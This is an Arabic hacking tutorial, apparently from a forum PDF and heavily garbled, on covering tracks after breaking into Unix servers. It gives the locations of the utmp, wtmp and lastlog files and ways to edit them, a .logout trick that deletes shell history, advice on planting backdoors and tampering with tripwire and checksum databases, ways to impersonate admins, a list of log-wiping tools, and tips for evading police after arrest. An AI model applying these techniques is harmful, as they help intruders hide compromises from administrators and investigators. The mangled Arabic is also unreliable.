‏-ماذالوتم ضب طالكومبیوترالشخصي والسیطره علىكلمعلوماتك ؟<br />

اذاكنتلاتقوم بعملاي اتصالات هاتفیه معاي شخ ص منالهاكرزاو الكراكرز .. ولاتبعثايایمیلات<br />

فیهمعلومات مشبوهه و لاتمتلكايمعلوما تامنیه و حساسه على جهازكفهذا ببساطه لا یشكلاي خو ف<br />

لانه ببساطهایضاان تلست مخترقاو(=‏ hacker<br />

لانه لابد من وجود اتصالبینك وبیناصدقائكالمهتمینبهذا المجال الاخبار والافكار<br />

كماانه لابد وانكتمتلك بع ضالملفات اللازمهللاختراق او بع ضالمعلوماتاليتعبر مدینهلكفي حالة<br />

حدو ث رصدلجهازك ‏(كبسه<br />

..<br />

.. لتبادل<br />

(<br />

< --<br />

--><br />

قم بتشفیركل ماتملكه منمعلومات حساسه sensitive data<br />

یمكنك ذلكباستخدام بع ض البرامجالموجوده مجانا علىالانترنت .. و هذهقائمهبافضل البرامج و التي<br />

تعتبراختیار الهاكرزالاول :<br />

‏-لمستخدمین MsDos الیكم v.17 SFS او‎1.4b SecureDrive<br />

‏-لمستخدمین نظام Amiga* الیكم * ( v1.5 EnigmaII<br />

(<br />

‏-لمستخدمینانظمةال Unix الیكمv1.33‎ CFS<br />

خصوصافي عالمنا العربي<br />

احدىانظمةالتشغیل غیر شائعةالاستخدام<br />

لتشفیر الملفا تبشكلفردي<br />

مل فبمل ف ‏)الیكم هذه البرامج ‏(الاكثر شهره والاحسناداء<br />

: (<br />

)<br />

- Triple DES<br />

- IDEA<br />

- Blowfish (32 rounds)<br />

- file2file<br />

لتشفیرالایمیلات:‏<br />

-PGP v2.6.x<br />

یمكنكایضاتشفیر عملیة اتصالك ب ( System Unix علىاساس انه ممكنانتكون مراقب<br />

و ذلكباستخدام<br />

(<br />

..<br />

..<br />

٤<br />

:<br />

SSH ‏-الامن حتىالان<br />

- DES Login<br />

غیر شائعه ‏..لاتوجدفيالقوامیس ‏..لكنفي نفس<br />

غیر منطقیه اجعلكلماتكالسریهصعبةالتخمین الوقت لابدان تتذكرها دائما<br />

اخترها من كتاب تتمتلكه .. اجعلهااكبر عدد ممكن منالاحر ف ) یعني عادة عند عملاياشتراك یطلب<br />

‏-‏‎٨‎احر ف ‏)فاخترال ٨ حرو ف<br />

منككلمه سریه تتكون من ٤٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لاتحفظارقام هواتفاصحابك الهاكرزبشكلاعتیادي ‏..انما یمكنكبانتشفرها<br />

فق ط ( و اتصلبهم منهوات ف الشار عاو منالعمل<br />

اذاانتبالفعل متعمق جدافيالهاكینجفلابد منتشفیركل شئیتعلقبهذهالامور<br />

احفظ دائما نسخهاحتیاطیه منمعلوماتك على CD او HD وبالطبعتكون مشفره حتىاذا خسرت<br />

المعلوماتالموجوده على جهازك یكونلدیك نسخاحتیاطیه<br />

ملفات مطبوعه و لاتریدها مرة<br />

لاتحتفظبملفاتلاتحتاجها<br />

اخر ىلاتقطعهااعتیادیاانمااحرقهافي مكان بعیدكل البعد عناماكنتواجدكالاعتیادیهاواناردت<br />

الاحتفاظبهافعلیك كتابتها من جدیدباسلوب مرمزاو مشفر لایعرفهالاانت !!<br />

هلتعر فانه منالممكنان<br />

) حتىبرموزتفهمهاانت<br />

!!<br />

..<br />

.. وانكانلدیك document files او<br />

:<br />

=================<br />

، المخابرات<br />

:<br />

تكون مراقب من ‏:الشرطه ‏،هاكرزاخرون وانهمیتسطیعون رصدكل حركاتباستخدام<br />

وسائل حدیثه لایمكنتخیلها<br />

مثل<br />

‏-اجهزهتصویرتستطیعتصویرك عند بعد مئاتالامتار<br />

‏-نقطةلیزر مصوبه نحو غ رفتكللتصنت على مكالماتك<br />

‏-موجات عالیة الترددللتنص ت علىلمسات و صوت یدیك علىال!!‏ keyborad<br />

تختل فبالطبع هذهالامكانیات من مكان لاخر و من دولهالىاخرى .. ویر ىالبع ضانهفیمااقوله مبالغه<br />

‏!!!لكنانتلاتعر ف ماذا یخبئلكالمستقبل ‏!!فلماذالاتستعد منالان<br />

كماانه هناك الكثییر مناخواننا العربفي دول الخارج الذيبالفعل تتوفرفیهااجهزةالتنصت هذه<br />

على رايالمثلالمصري ‏"امشي عدل یحتار عدوكفیك ‏"فكلماكنتاحتیاطیا و حركاتكت حسبهابشكل<br />

ص حیح ‏!!!ففر صاطاحتكقلیله جدا<br />

... و<br />

!!!<br />

حساباتك واشتراكاتالشخصیه<br />

:<br />

:<br />

===================<br />

هنا سأتكلم عن حساباتكالشخصیه سواءكانتفي العمل\‏ المدرسه\‏ الجامعه\ايكانفعلیكبالتالي<br />

‏-ابدا لاتقومباي عمل غییرقانوني ‏..او مشبوهب حسابتكالشخصیهالتيفیها یكوناسمكالحقیقي و<br />

هویتك وتفصیلاتكامله عنك<br />

‏-عمرك ماتحاولان تتصلبموقعقدتماختراقهبواسطةال telnet<br />

‏-یمكنكالاشت راكب حسابك الخا صفيقائمة البرید لاي موقعامني security من دون خو ف<br />

..<br />

-<br />

-<br />

-<br />

لكنكل مو هو مخت صبالهاكینج من ملفات لابدانتشفراوانهایتم مسحهافورا<br />

ابدا لاتحفظايبرامج وادواتالاختراق على الهاردیسكفي حسابكالشخصي<br />

بریدكالحقیقي لاتعطیهالالمنتث قفیهثقه عمیاء<br />

‏-اهتمامكبالسكیورتي لایجعلك مشبوها ‏..انماالاهتمام بعكسالسكیورتيهو المشكله == ‏


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

!<br />

- UTMP<br />

- LASTLOG<br />

للمتواجدیناونلاین حالیا<br />

تسجیل مناین جاءت هذه logins<br />

‏**سنتكلم عنهمباستفاضهوتعم قفیما بعد ‏(فيجزءاخر من نفسالموضو ع<br />

(<br />

:<br />

!!<br />

كل عملیة دخولبواسطةال telnetیتمتسجیلهافي , ftp , rlogin هذهالملفات .. لابد حذ ف دخولك<br />

من هذهالملفات والا سیتممعرفةالاتي<br />

‏-ماذاقمتبالاختراق<br />

‏-مناي مكانانتقادم<br />

‏-كم من الوقت بقیتاونلاین..‏<br />

( و<br />

خطا یقعفیهالجمیعبنسبة % ٩٩٫٩<br />

..<br />

مننا ) حتىاناكنتاقعفي نفس هذا الخطا زمان ‏..لكن اتعلمت<br />

هوانكتمسحاللوقات logfiles<br />

علطول .. هذا مجديفي حالةانك لاتهتمبانیعر فالادمینانه هناك مخترق ماقد دخل علىالنظام ‏..اما<br />

اذاارد تانتشتغل شغلالمحترفین علیك الدخول و الخروج دونان یلاحظكاي شخ ص ‏..دون انتقوم<br />

بتغییراي شئ یلف تانتباه مدیرالنظام<br />

و لعمل ذلكتابعمعي :<br />

لاتعتمد البرامجالتي روجت علىانهالاتقومبمسح اللوقانماتقومبحذ ف دخولكفهي غییر مجدیه مثل<br />

برنامجZAP2‎ ZAP (or<br />

لانه یقوم بعملاصفاركاخرلوق مكانك انت و هذاایضا دلیل على وجود خطا سیلاحظه مدیرالنظام<br />

اذا علیكبالقیام بذلك یدویا<br />

عادة لابدانتكوت root لتغیروتعدلفيال ( files logباستثناء بع ض التوزیعاتالقدیمه جدا<br />

اماكنتواجد ملفاتاللوق ( defaultتختل فباختلا ف التوزیع<br />

(<br />

(<br />

UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log<br />

WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log<br />

LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log<br />

وفي بع ض النسخالقدیمه$‏home/.lastlog<br />

لا تترك اثرا:‏<br />

=======<br />

كثییر من الهاكرز ینجحونفي عملیة حذ ف دخولهم من ملفاتاللوق<br />

و هيالملفات التيتوجد هنا<br />

/tmp and $HOME<br />

و جودال Shellفي History HOME$ مصدرقلقكبییر<br />

‏..لكنهم ینسونامرا هاما وقاتلا<br />

!!!<br />

:<br />

History files :<br />

sh : .sh_history<br />

csh : .history<br />

ksh : .sh_history<br />

bash: .bash_history<br />

zsh : .history<br />

Backup Files :<br />

dead.letter, *.bak, *~<br />

٥<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لكن الحل موجودایضالمسحال : files History<br />

mv .logout save.1<br />

echo rm -rf .history>.logout<br />

echo rm -rf .logout>>.logout<br />

echo mv save.1 .logout>>.logout<br />

!!!<br />

23 http://www.host.<strong>com</strong>/<br />

(<br />

..<br />

..<br />

‏-امور و اشیاء یجبتجنبها وال حظر منها<br />

======================<br />

لاتقومابدا بكسرايباسوردالا على encryptedكما partition علیك دائماانتتحذر مناستخدام<br />

اشتراكاتك ( اشتراكالجامعه على سبیلالمثال<br />

لانهبم نتهى البساطه یمكنان یرى ماتفعله مدیر الشبكه admin و منثم سیعر ف مالذيتقومبه و<br />

الملفات التيتستخدمهاالخ<br />

حاول دائماانتغییراساميالبرامج المشبوههلدیكیعنياحناالعرب خصوصا غاویین نسمياسماء<br />

اسامي مخیفه علىالفاضي<br />

لاتفكرفي نفسكفقط .. یعني حینانتستخدم بع ضالاشتراكاتاوال shellsالتيتسمحبالعملالخلفي<br />

backgroundلابدانتعر فانكتبطئ من سرعةالسیرفر وبالتاليتلفتالانظار<br />

حاولانلاتستخدم parametres علىقدرالمستطا ع ... على سبیلالمثالاذاارد تان تتصل منالشیل<br />

علىتیلنتلموقعمعیناو سی رفرمعینلاتقوم بعملالاتي : telnet<br />

انما ببساطه اتبع الخطوات البطیئه وهي<br />

telnet<br />

open<br />

http://www.host.<strong>com</strong>/<br />

و هكذا ..<br />

في حالةانكاخترقت سیرفرمعین منالافضلانتضع علیه backdoors مخصصهلنظام التشغیل<br />

م ش sub7‎هههههههههه ( و هيكثییره و موجوده مجانا علىالانترنت<br />

الجزء الرابع ‏:التقنیات الحدیثه اليیتي یجب ملاحظتها<br />

)<br />

===============================<br />

-<br />

*******<br />

تمهید<br />

:<br />

بعدانثبتاول sniffer و خططتلبداالاختراقات .. علیكانتعر فكی فتستخدم هذهالتقنیات متعبا ما<br />

یلي<br />

‏-امنعتقفى اثرك مناي نو ع<br />

...<br />

!!!<br />

**********************<br />

)<br />

قد یلاحظ الادمین مدیر الشبكه ( وجودككمخترق hacker وانكاطحتباحدالمواقعلكن هذا لایهم<br />

المهمهوانهكی ف سیرصدك و عندهاكیف یمكنانیتعاملمعك<br />

لذاففي هذا الجزء سیتمتوضیحكلالاحتمالات والاسالیبالذي یمكنبها تتبعك و رصدك وایضاكی ف<br />

یمكنانتمنعها ...<br />

admin ) )<br />

‏*منالطبیعي ‏(العادي ‏)ان یسهل على مدیرالشكبه معرفة النظامالذيكانالمخترق علیه<br />

عند دخوله على شبكتهو ذلكاما عن طریق ملفاتاللوق ) هذاانكانالهاكر غبي لتركهاكماهي ‏)او من<br />

ال output منال sniffer<br />

٥٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

او مناوامر netstatفي حالةان المخترق مازال موجودا online<br />

من اجل هذاتختاجال !! Server GateWay<br />

..<br />

A gateway server in between ‏*هذا واحد منالكثییر من السیرفراتالتي یوجدلك حساب<br />

علیها والتيتعتبرفي منتهى السخافهفيالاستخدام وانتتحتاج لانتكون رووت علیها لتستطیعتغییر<br />

ال wtmp and lastlogs<br />

كماانه لابدان مناستخدام اكثر من gateway server وانتبدلبینهمباستمرار حتى لایتم الكش ف<br />

عنك<br />

منالشیل الذي ستخترق منه ‏..قمبالاتصالبال gateway server و منثم تتصلبالسیرفر المراد<br />

اختراقه<br />

تحتاج دائما<br />

باستخدامك ل Dialupیجنبكالكثییر server من المشاكل حیثانكفي غنى عن التعدیلفي ملفات<br />

اللو قبشرطانتدخلباشتراك مختل ففيكل مرهتدخلفیها علىال (= system hacked<br />

ملحوظه ‏:اذاكنتقادر علىالاتصالبسرفیرات dialupكثییرهفلا حاجهلانتستخدم hacking<br />

serverلانه سیتغیر اثرك بتغیر الشركات المختلفهالتي تتصل من خلالها<br />

..<br />

ل root access لتغییراللوق)‏<br />

..<br />

==> (<br />

بالنسبهللمتواجدینفيالولایات المتحدهالامریكیه واوروبا ‏(الدولالمتقدمه ( حتى وانقمتبما سبق (<br />

) servers dialupیمكنهمتسجیلكل اتصالتم ولدیهمارشیفات منذ سنیین هذا عددها<br />

نتیجه واختصارللنقطه السابقه موضحهبالرسمفيالصورهالتالیه:‏<br />

!<br />

‏-ایجاداي نو ع منانوا ع ملفاتاللوق lOGs مهماكانفیها منتلاعب..‏<br />

**************************************************<br />

:<br />

***<br />

منالهام والضروري جداانتعثر علىكل ملفاتاللوق حتىالمخفي منها ‏..لل حصول والعثور على هذه<br />

الملفات یمكن ذلكبهاتینالطریقتین<br />

<strong>١</strong> ‏-ثر على جمیعالملفاتالمفتوحه ‏:و یمكنك ذلكباستخدامبرنامج LSOFهواختصار List Open<br />

Filesو منثم یمكنالعثور علیهم والتعدیلفیهم<br />

حث عنكل الملفات التيتغیرت حد ثفیهاتغییر من بعد دخولك -<br />

(<br />

)<br />

-٢<br />

بعد دخولكقم بعمل touch /tmp/check و بعدهاقم -print" "find / -newer /tmp/check<br />

٥٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

العملیه التي سنقومبها ستاذ خالشكلالتالي ‏:ب حث<br />

نتائج-‏ ‏ تعدیل<br />

> -<br />

قمایضابالتشیك علىاماكنال log files الاعتیادیه usr/adm/ و var/adm/ و var/log/<br />

..<br />

اذایتمتسجیلالعملیاتفيال loghost یعني xx@loghostفانت هنافي مازق حیثانه لابد من<br />

انتخترقال loghost لتعدل ملفات اللوق<br />

یمكنتعدیلاللوق logfiles بعدة طرقابسطهاباستخداماي محرر كتابه text editor اوقم بعداسطر<br />

المل فباستخدام wc و منثم حذ فاخر ‎<strong>١</strong>٠‎اسطر من<br />

‏"‏LineNumbersMinus10‎بالعربي ) عددالسطور مطروحا<br />

مثبت علىالسیرفر یمكنك ببساطهاستخدام acct-cleaner from<br />

zhartوهوهیعملاللازم<br />

خلال-‏ "head :<br />

<strong>١</strong>٠ منه ) head -<br />

اذاكانبرنامج accouting<br />

(=<br />

اذاكانالنظام یستخدم wtmpx و utmpx ایضافمعالاس فعزیزانتفي ورطه ‏!!!فانا علىاعر ف<br />

ايبرنامجللتعاملفي هذهالحاله ‏..لواستطع تانتبرمج واحد ‏(للاخوهالمبرمجین ‏)لاتنسىانتعلنابه<br />

‏-تحقق منlogfile syslog configuration and<br />

************************************<br />

تعتمدمعظمالبرامج علىال syslog function لتسجیلاي شئ یریدونه ‏..فعلیكان تتحقق من<br />

خصائ صال syslog<br />

فاذاكانتاللوقات logs لاتخزنفقط علىالجهازانما على hostsاخرى ‏...فیؤ سفني انك لابد من<br />

اختراق هذهhosts<br />

ملفال syslog موجودفي/‏etc/syslog.conf<br />

‏-تحقق من نوعیاتبرامجالامن المثبته<br />

******************************<br />

توجد العدید منبرامجالفح صالأمني غالبا علىالمواقع ذات الحسالأمني العالي.‏ وتدار هذة البرامج<br />

بواسطهأداهتسمى cron و یكون مكانهاالأفتراضيأوالطبیعي هو var/spool/cron/crontabs/<br />

و هيتقومبمتابعه جمیع المدخلات<br />

.<br />

الموضوع نستخدمالأمرالتالي<br />

" crontab -l root".<br />

خاصهال Rootو الملفاتالتي یستعملها.للتحقق اللسریع من<br />

غالبا ماتكون هذه الأدوات محمله و عامله على حساب المدیر.‏ و یكون بعضهافي مجلد ال bin/~ الخا ص<br />

به.كما یمكنان یكون هناك sinnefer موضو علأ غ را ضامنیهفي نفسالمكان.‏<br />

منالأدوات ال تتستعملفي مثل هذه الفحوصات الداخلیه<br />

tiger, cops, spi, tripwire, l5,<br />

binaudit, hobgoblin, s3 etc.<br />

-<br />

ینبغي علىالمقتحمأنیتأكد من وجود هذهالأدوات و التأكد منالتقاریر التيترسلها ‏،للتأكد منأنها لا<br />

تكشف عملیه الأقتحام<br />

یمكنكتعدیل مفات هذهالبرامجللتأكد منأنهالنتقومبالأبلا غ عنالأقتحام،و یمكنتنفیذ ذلكبطریقتین:‏<br />

قم بتعدیلالبرنامجبرمجیالكي لا یقومبالأبلا غ عنك(واسعه شویه دي)أوقم بأزالته وأستعملبرنامجا<br />

مزیفا<br />

‏-قدتضطرإلىأزالهال back door الذيأستعملته ومحاولهتحمیلهبطریقهأخر ى<br />

٥٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

-<br />

-<br />

-<br />

‏-تحقق من وجودالمدراءAdmins<br />

****************************<br />

منالمهمأنتجد جمیعالمدراء على الموقع ‏،وتحاولمعرفه ال حسابات العادیه التيیتمأستخدامها.‏<br />

توجد عده طرقلكشف هذهالمعلومات :<br />

قم بفح ص المل ف .forword و مدخلات الalias<br />

أفح ص مل ف ال sulog و حددالمستخدمین الذین نجحوفيتنفیذالأمر suبنجاح root<br />

أسحب مل ف ال group وأب حث عن جمیع المجموعات التيلها علاقهبالأداره root, ( admin,<br />

wheel, etc<br />

‏-أسحب مل ف passwdبالنسبهللمدیر لعر ضكلمات سرالمدراء<br />

یعدكل هذا ‏،یمكنكمعرفهكلالمدراء علىالموقع.أدخلإلى مجلداتهم الخاصه ‏(في حاله عدمأستطاعتك<br />

‏،أستخدمأحد ىالأدواتالتالیه ‏,‏chid.cلأنتحال changeid.c شخصیه المستخدم)‏ . وأفح صالملفات<br />

لمعرفه الأوامر التي یستعملونها عادة،قد یفیدك<br />

هذافيمعرفه دورالمدیر علىالموقع،أو أكتشا فمعلومات مخفیه.قم بف ح ص ملفات<br />

لمراجعهأعدادات ال aliasالتيتستخدم ، وإ ذا ماكانتأدوات<br />

أمنیه خفیه مستخدمه.‏ و من الطبیعي طبعاأنتقوم بفح صكافه الملفات والمجلدات خاصهالمخفیه منها<br />

قدتجد بع ض الأشیاءالمفیده حقا<br />

،<br />

التالیه history/.sh_history/.bash_history<br />

.profile/.login/.bash_profile<br />

checksum checking software<br />

************************<br />

برامج checksum<br />

‏(هوقیمة رقمیة تُ‏ ستعملللتأكد من خلوالبیانات منالأخطاء.‏ هذهالقیمةتُ‏ حسب من<br />

خلال عملیةكش ف الجمع (<br />

بع ضالمدراء ویقمونباستعمالبرامجللتحقق من حدو ثايتغییراتفي الملفات،‏ وفي حالة حدو ثاي<br />

تغیر ، یقوم بفح ص الملفات ویستطیعاكتشافها<br />

فكی فتعر ف مااذااستخدمت هناكبرامج التحقق وايالانواعاستخدمت؟ واذاعرفتفكی فتعدلهاب حی ث<br />

تخدم مناجلك ؟<br />

هناكانوا ع عدیدة منبرامجالتحق ق ومن السهل كتابة واحدة منهابنفسك ولكن منالصعب اكتشا ف مااذا<br />

استخدمت مثلتلكالبرامج عليالملفا تللحمایة<br />

هذهاسماء بع ضالبرامج التيتقوم ب عملیةفح صchecksum<br />

SOFTWARE : STANDARD PATH : BINARY FILENAMES<br />

tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire<br />

binaudit : /usr/local/adm/audit : auditscan<br />

hobgoblin : ~user/bin : hobgoblin<br />

raudit : ~user/bin : raudit.pl<br />

l5 : <strong>com</strong>pile directory : l5<br />

... (<br />

كماتريهناكاحتمالاتكثیرة،‏ ربماالبرنامج نفسهاوقواعدالبیانات یوجد عليجزء آخر ، مثلجزء<br />

لمضی فاو جهاز آخر ‏،او حتيقواعدبیاناتالتيتحملمعلومات checksumفي جهاز<br />

محمي علي الكتابة ‏(اقرا ص CD مثلا<br />

ولكن یمكنكالقیام بعملیةفح صاستطلاعي سریعلمعرفة البرامج المستخدمة ، واذالمتستخدمففرصتك ،<br />

NTFS<br />

٥٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

واذالمتجد شي ولكنككنت متاكدا مناستخدامهم لتلكالانوا ع منالبرامج هذایعنيان الموقعاوالمزود<br />

محميبشكل جیدا ‏(هاردلك<br />

( ویجبانلاتعبثبالملفاتابدا ..<br />

و لكن ماالعملاذا اكتشف تانهم یستخدمونتلك البرامج وبامكانكتغییرها؟؟<br />

یمكنك<br />

<strong>١</strong> ‏-ایهامتلكالبرنامجبطرق شرعيبانهتمتغییر مل ف مابشكلقانوني ویتمتحدیثقواعدالبیانات<br />

" tripwire -update /bin/target".<br />

مثلا<br />

‎٢‎ا-‏ نكتغییرقائمةالملفاتالتيیجبف حصها وتزیلاسم الملفات المراد من القائمةفلایتمف حصها مرة<br />

اخريللتحقق ) ولكن یجبان تتاكدایضاان مل فقواعدالبیانات نفسها لایتمف حصها ب checksum<br />

حتي لایتم اكتشا فالتغییرات التيقمتبها)‏<br />

(<br />

حیلالمستخدمالامنیه<br />

*******************<br />

هذه ال حیل ما ندرتوجداوتستخدملكنني كتبتهافقط لاكون شملتكل شئ ‏(لكمالالموضو ع ( ‏..فبع ض<br />

المستخدمین یسموناشتراكاتهم admins وبالطبع لا یریدونانیعبثفي ملفاتهماي شخ صفیقومون<br />

بعمل بع ضال حیلفي ملفاتال startupلذافدائماتحقق من .profile, .cshrc, .login, .logout<br />

الخ ‏(ايالملفات التيتبدابنقطه<br />

الجزء الخامس<br />

(<br />

:<br />

=========<br />

ماذاتفعلانوضعتتحتالمراقبه؟<br />

***************************<br />

متىاصحبتتحتالمیكروسكوب(‏ المراقبه منقبلالشرطهاو حتىال administratorsعلیكالقیام<br />

بخطوات هامه و سریعه حتى لایستطیعوالامساكبدلیل ‏(برهان<br />

‏-ملحوظه<br />

( علیك<br />

...<br />

‏:انكانفياعتقادال administrators انك hackerفانت == > مذنب حتىتثبتبراته<br />

لایعني القانوناي شئلل ( admins بع ضالاوقا تاعتقدانه لا یوجدفر قبینال hackerوال<br />

انكهاكر<br />

administratorالابان مالكالكومبیوتر هوال administratorفقط<br />

فانكفورااصبحت مذنب سیقومو مباشرةبمراقبةبریدك اللكتروني و ملفاتك وانكان محتر فالادمین<br />

سیرصدكایضا هجماتكالاخرى<br />

اذاكان یمكنهم مراقبةكل هذهالاتصالات اكید ببساطه یمكنهم مراقبة خطتیلیفونك<br />

لذا فعلیك عدمالقیامباي اتصالا تفیهااخباراخترقاتك .. وان حتىارد تانتحذراصحابكفلاتخبرهم<br />

هاتفیااو ببریدالكتروني ‏(الااذاكان مشفرا)‏ و منالافضلانتخبرهم عندماتقابلهم وجهالوجه<br />

تمنعهم من راسالاي رسائل غییر عادیه<br />

لتؤمن نفسك علیكانتبقى على هذا الحال علىالاقل من شهرالى شهرین .. والا ستواجه مشاكل اعتقد<br />

.. و<br />

( عندمایعتقدون<br />

..<br />

..<br />

..<br />

..<br />

٥٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

انكلاتر غ ببها<br />

الجزء السادس :<br />

=========<br />

ماالذي علیكالقیامبه وایضا الذي لابد من عدمالقیامبهفي حالةانهتم القب ض علیك:‏<br />

**************************************************<br />

!!!! ‏:لات<br />

**************<br />

اولا ‏:اطلب محامیكفورا حاولبان تتذكىانت وترد علىالتحقیقبمفردك ‏..فاطلب محامیككي<br />

یدافع عنكهو و یطلعك على ما یجبانتذكره و ما یجبان لاتذكره نهائیا .. بعدها غالبا ما سیطلب<br />

المحامي جهازك ‏(الكومبیوتر ‏)باقصى سرعهب حجةاحتیاجهفيالعمل والا علیهمتحمیل جمیعالاعباء<br />

المادیه و المشاكل التيقدتحد ث عن عدكاستخدام الجهاز ‏..لذافانه من العملي جداان یكون عندك<br />

محامي جاهزفياي وقتقبلانتقع الفاسفيالراسو بعدهاتبدافي البح ث والتدویر<br />

ثانیا ‏:ابدا لا تتكلمالاالشرطه !!! : لاتعطيللشرطهايمعلومات عنكاو عن زملائكب حجةان هذا<br />

سیخف فالعقاب عنك و سیخرجك منالمازق ‏..لان هذالن یفیدكبل سیدینكاكثر .. وانكان یجب<br />

استجوابكفاطلبانیتم هذافقط من خلال محامیك ) و هذاایضا حق من حقوقك<br />

لاتخبرابدا عناصدقاؤكلیسققطكنو ع منالشهامه ‏..انماایضابدخولاصحابكفي الموضوع ست سع<br />

دائرة الموضو ع و منثمتزیدالمعلومات عنك و عن جرائمك و همایضا!‏<br />

بع ضالدول من ضمنقانونهاانهاذالمتستطعالشرطهفكتشفیر ملفاتكاوجزء من الهارد دیسكفیمكنك<br />

بمنتهىالحریه عدمالافصاح عنها<br />

لكن بع ض الدولالاخر ىفيقانونهاانه مادامت وقعتفيالمصیده لابدانتدليلهم بكل شئفي هذه<br />

الحالهانص حكباستشارة محامیك وانكارانكلدیكاياقرا ص صلبه مشفره<br />

(<br />

الجزء السابع:‏<br />

========<br />

قائمهبافضلالبرامجللتخفي والاختباء:‏<br />

******************************<br />

Change - Changes fields of the logfile to anything you want<br />

Delete - Deletes, cuts out the entries you want<br />

Edit - real Editor for the logfile<br />

Overwrite - just Overwrites the entries with zero-value bytes.<br />

Don't use such software (f.e. zap) - it can be detected!<br />

---------------------------------------------------------------<br />

LOG MODIFIER<br />

++++++++++<br />

ah-1_0b.tar Changes the entries of accounting information<br />

clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx<br />

cloak2.c Changes the entries in utmp, wtmp and lastlog<br />

invisible.c Overwrites utmp, wtmp and lastlog with predefines values,<br />

so<br />

it's better than zap. Watch out, there are numerous inv*.c !<br />

٥٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!<br />

wzap.c Deletes entries in wtmp<br />

wtmped.c Deletes entries in wtmp<br />

zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!<br />

--------------------------------------------------------------------------------------<br />

:<br />

=========<br />

كلمه ختامیه<br />

**********<br />

!!<br />

(<br />

....<br />

الجزء الثامن<br />

لاتدعهمابدا یقبضون علیك .. دائمااجعل عیناك مفتوحان ‏..اعر ففي منتثق و من لا<br />

لاتفكرفي نفسكفقط ‏(انماایضاتذكركل من حولك<br />

تمنیاتيللجمیعب حیاة ممتعه وامنه<br />

٥٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

حمایة<br />

" المنتدیات<br />

$$$$$$$$$$$$$<br />

حقوقهلشبكةالعقرب<br />

$$$$$$$$$$$$$<br />

الكلیعر فلغة php والتي یصممبهاالمنتدیات و الكلیعر فأیضاأنها ملیئةبالثغرات الكبیرة<br />

إلیك مدیرأي منتد ى ) <strong>vb</strong> ( بع ضالأساسیات التيیتمبها حمایة<br />

/ منتداك<br />

‎<strong>١</strong>‎‏-لاً‏ وقبلكل شيءالمدیرالعام ضع مدیرینإثنین واحدتكتبفیهالمشاركاتوتعدیلالمنتدى وكل شيء<br />

والآخر للإحتیاط عندما یسرق المدیرالعام .<br />

‎٢‎‏-ميلوحةالتحكم بكلمة سرأي إفتح مل ف index.php الموجودبمجلد adminبواسطةالمفكرة و<br />

أض ف علیهكودكلمةالسر الذي هو /<br />

<br />

معتغییركلمتي<br />

User<br />

و<br />

Password<br />

-٣<br />

حقك لی س من<br />

غقائمةالأعضاءلماذا ؟؟ مثلالوكانلدیك ٣٠٠٠ عضو ووضعالزائرالكریمقائمةالأعضاءوقعد<br />

یفحطبهأصبح هناك ضغطكبیر علىالمنتد ىقدتسألونيلماذا لا نلغيقائمة الب ح ث ‏!!لأن البحثفي<br />

٥٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

النسخ الجدیدة یكون بأكثر منثلا ثأحر ف وبهذالن یكونهناكأي ضغ ط .<br />

٤ ‏-تكثر فتحلغة HTMLفي المنتدیاتأي إفتحهابمنتد ى واحدأوإثنینفقطلوجودالضرورة ‏..لماذا ؟؟<br />

لأنه یوجدكود هتمل یفسد جمیعالمواضیع التيتعتمد على هذهاللغة<br />

.<br />

‎٥‎‏-توقیع و ماأدراك ماالتوقیع . إ جعلهفقط یخدمالصورأماالفلا ش و الصوتفلا ....<br />

٦٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

‏"أمن الشبكات"‏<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$<br />

الكاتب:الجوكر<br />

$$$$$$$$$<br />

‎<strong>١</strong>‎‏-عر ضلبع ض المخاطرالأمنیة التيقد تتعر ضلها الشبكة وكیفیة الوقایة منها.‏<br />

٢ ‏-وص ف لعلاقة الولوجالىالشبكة بأمنها.‏<br />

٣ ‏-كیفیة حمایة المواردبواسطةتراخی صالوصول.‏<br />

